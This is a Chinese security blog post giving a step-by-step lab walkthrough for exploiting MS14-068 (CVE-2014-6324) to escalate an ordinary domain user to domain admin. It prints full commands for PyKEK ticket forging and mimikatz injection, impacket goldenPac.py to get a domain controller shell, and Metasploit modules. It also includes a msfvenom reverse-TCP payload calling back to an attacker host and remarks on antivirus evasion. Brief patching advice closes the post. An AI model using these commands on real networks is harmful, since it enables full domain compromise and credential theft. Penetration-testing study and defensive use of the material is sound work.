freeBuf
kerberos-MS14-068(kerberos域用户提权)
2024-04-02 10:19:31

微软官方在2014年11月18日发布了一个紧急补丁,Windows全版本服务器系统受到影响,包括Windows Server 2003,Windows Server 2008,Windows Server 2008 R2,Windows Server 2012和Windows Server 2012 R2,修复了Microsoft Windows Kerberos KDC(CVE-2014-6324),该漏洞可导致活动目录整体权限控制受到影响,漏洞允许黑客将域内任意用户权限提升至域管理级别。通俗来讲,就是恶意攻击者获取域内任何一台计算机shell权限,同时还知道任意一名域用户用户名、sid、密码,即可拿下域管理员进而拿下域控制器,最后拿下整个域权限。

导致这个漏洞产生的原因就是在用户向KDC(Kerberos密钥分发中心)申请TGT(由票据授权服务产生的用来证明身份的凭证)时,可以伪造自己的Kerberos Ticket(Kerberos票据),该Ticket声明自己是域管理员,而KDC在处理该Ticket时未正确验证Ticket的签名,所以返回给用户的TGT使普通域用户拥有了域管理员权限,该用户可以将TGT发送到KDC,KDC中TGS(票据授权服务)在验证TGT后,将Service Ticket(服务票据)发送给该用户,该用户拥有访问该服务的权限。使攻击者可以访问域内资源。

利用Kerberos提权的常用方法介绍

1、使用Pykek工具包配合mimikatz进行测试;

2、使用impacket工具包中goldenPac.py进行测试。

3、使用metasploit进行测试。

4、修复方案

我们常用的方法为第一种,好处是在于pykek只需要系统存在python2.7环境即可,还可以将python文件转换为exe,在免python环境下也可以执行。第二种方法的好处是可以直接得到交互shell,操作简单便捷,适合新手。但该工具是通过psexec的方式获得shell,该方法会产生大量日志,再之psexec已经被较多反病毒厂商列为危险文件,免杀效果较差。第三种方法好处是在metasploit下进行操作,metasploit是一款较为成熟的后渗透框架,其中包含大量exp,可以更快的进行渗透测试工作,坏处是操作步骤较多,较为复杂,不适合新手操作。

测试环境如下:

域:pentest.com

域账号:user1/Aa123456@

域sid:S-1-5-21-3112629480-1751665795-4053538595-1104

域控:WIN-2K5J2NT2O7P.pentest.com

Kali:172.16.86.131

域机器:172.16.86.129

Pykek工具包

Pykek是利用Kerberos协议进行攻击的工具包,Pykek可以生成一张高权限的服务票据,再使用mimikatz(法国人开发的轻量级调试器)将服务票据注入到内存。

Pykek(Python Kerberos Exploitation Kit),其下载地址为

https://github.com/mubix/pykek,

如图6-47所示。

图6-47脚本下载页面

(1)工具说明

ms14-068.py为Pykek工具包中利用脚本,如图6-48所示

图6-48 查看ms14-068.py

其参数如下

USAGE:ms14-068.py-u <userName>@<domainName> 用户名@域名-s <userSid>        用户sid-d <domainControlerAddr> 域控制器地址OPTIONS:-p <clearPassword> 明文密码。--rc4 < ntlmHash> 没有明文的情况下,Ntlmhash登录。

(2)获取域控制器修复补丁情况

输入命令wmic qfe get hotfixid

微软对CVE-2014-6324提供的补丁修复为KB3011780,如图6-49所示,未发现该补丁。

图6-49获取域控制器修复补丁情况

(3)获取用户的SID

登录用户user1,输入命令,whoami/user。可以看到user1用户的SID为

S-1-5-21-3112629480-1751665795-4053538595-1104

如图6-50所示。

图6-50获取用户的SID

还有一个方法也可以用来获取用户SID,

输入命令wmic useraccount get name,sid

可以获取域内所有用户名和SID,如图6-51所示。

图6-51获取所有用户的SID

(4)使用Kerberos利用工具Pykek生成高权限票据

使用方法:

ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

在Pykek目录中输入如下命令,如图6-52所示,在当前目录生成了一个名为TGT_user1@pentest.com.ccache的票据文件。

python ms14-068.py -u user@pentest.com -s S-1-5-21-3112629480-1751665795-4053538595-1104 -d 172.16.86.130 -p Aa123456@

图6-52使用Pykek生成高权限票据

(5)查看注入前权限

将票据文件复制到Windows 2008机器mimikatz目录中,使用mimikatz将票据注入到内存。先查看当前是否有权限访问域控制器,输入命令,如图6-53所示。

图6-53注入票据前无法列出域控制器C盘目录

输入命令net use \\WIN-2K5J2NT2O7P\c$,提示Access is denied。

(6)清空内存中所有的票据

再打开mimikatz.exe,输入命令kerberos::purge清除现有票据信息,当看到Ticket(s) purge for current session is OK表示成功清除,如图6-54所示。

图6-54清空内存中所有的票据

(7)将高权限票据注入到内存

在mimikatz中输入如下命令,看到Injecting ticket :OK表示成功注入,如图6-55所示,输入exit,退出mimikatz。

kerberos::ptc “TGT_user1@pentest.com.ccache”

图6-55将高权限票据注入到内存中

(8)高权限注入到内存后验证权限

查看是否可以连接域控制器,再次使用dir尝试列出域控制器C盘目录,如图6-56所示,成功列出域控制器C盘目录。

图6-56注入后成功列出域控制器C盘目录

注:net use 在连接ip的时候可能会失败,故使用机器名进行连接。

goldenPac.py

goldenPac.py是被集成在impacket工具包中,用来操作kerberos的工具。goldenPac.py存放在impacket-master/examples目录中。

使用方法:

python goldenPac.py 域名称/域成员用户:域成员用户密码@域控制器地址

(1)依赖环境准备,安装kerberos客户端

Kali中默认未包含kerberos客户端,首先安装它。

输入命令apt-get install  krb5-user -y

(2)利用ms14-068配合psexec获取域控制器的cmd shell

goldenPac.py pentest.com/user1:jackpwd@dc.pentest.com

就可以得到一个cmd shell,如图6-57所示。

图6-57使用goldenPac.py获得一个域控制器cmd shell

注:

(1)该工具不止可以直接得到一个shell,还可以直接上传程序,

(2)该工具可以直接执行获取一个Cobaltstrike Beacon。

metasploit中利用ms14-068攻击域控制器

首先打开metasploit找到ms14-068利用脚本位置如下。

use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

列出该脚本所需选项,如图6-58所示。

图6-58列出该脚本所有选项

DOMAIN:域名称

PASSWORD:被提权用户密码

USER:被提权用户

USER_SID:被提权用户SID

填写完成所有信息后输入exploit执行。在/root/.msf4/loot目录下生成了一个名为

kerberos::clist“20180715230259_default_172.16.86.130_windows.kerberos_839172.bin”

的bin文件,如图6-59所示。

图6-59执行脚本,攻击域控制器

接着进行转换格式。由于msf不支持bin格式文件导入,先使用mimikatz将文件转换格式,在mimikatz 中输入以下命令,导出后文件为kirbi格式,如图6-60所示。

kerberos::clist”20180715230259_default_172.16.86.130_windows.kerberos_839172.bin” /export

图6-60 格式转换

最后使用msfvenom生成msf反向连接木马,在msfvenom中生成木马,如图6-61所示。

在kali中输入如下命令。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.86.135 LPORT=4444 -f exe > shell.exe

图6-61使用msfvenom生成msf木马

此时获得一个meterpreter的session,将生成的木马shell.exe上传到windows 2008机器中并执行。

在metasploit中输入如下命令。

use exploit/multi/reverse_tcpset lhost 172.16.86.135set lport 4444exploit

可以看到上线一台主机ip为172.16.86.129。输入getuid回显PENTEST\user1,如图6-62所示。

图6-62成功获取一个session并加载kiwi

输入

load kiwi

输入

kerberos_ticket_use /tmp/0-00000000-user1@krbtgt-PENTEST.COM.kirbi

将票据导入,然后输入命令background将meterpreter切到后台,这里就可以使用高权限票据来进行权限提升。

在msf中输入以下命令执行。

use exploit/windows/local/current_user_psexecset TECHNIQUE PSHset RHOSTS WIN-2K5J2NT2O7P.pentest.comset payload windows/meterpreter/reverse_tcpset lhost 172.16.86.135set session 1Exploitmeterpreter > getuidServer username: NT AUTHORITY\SYSTEM

成功提升权限。

修复方案

1、开启Windows Update功能,进行自动更新。

2、手工下载补丁包进行修复,微软已经在官网发布修复补丁ms14-068。

3、对域内账号进行控制,禁止使用弱口令,及时并定期修改密码。

4、在服务器端安装反病毒软件,及时更新病毒库。

本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏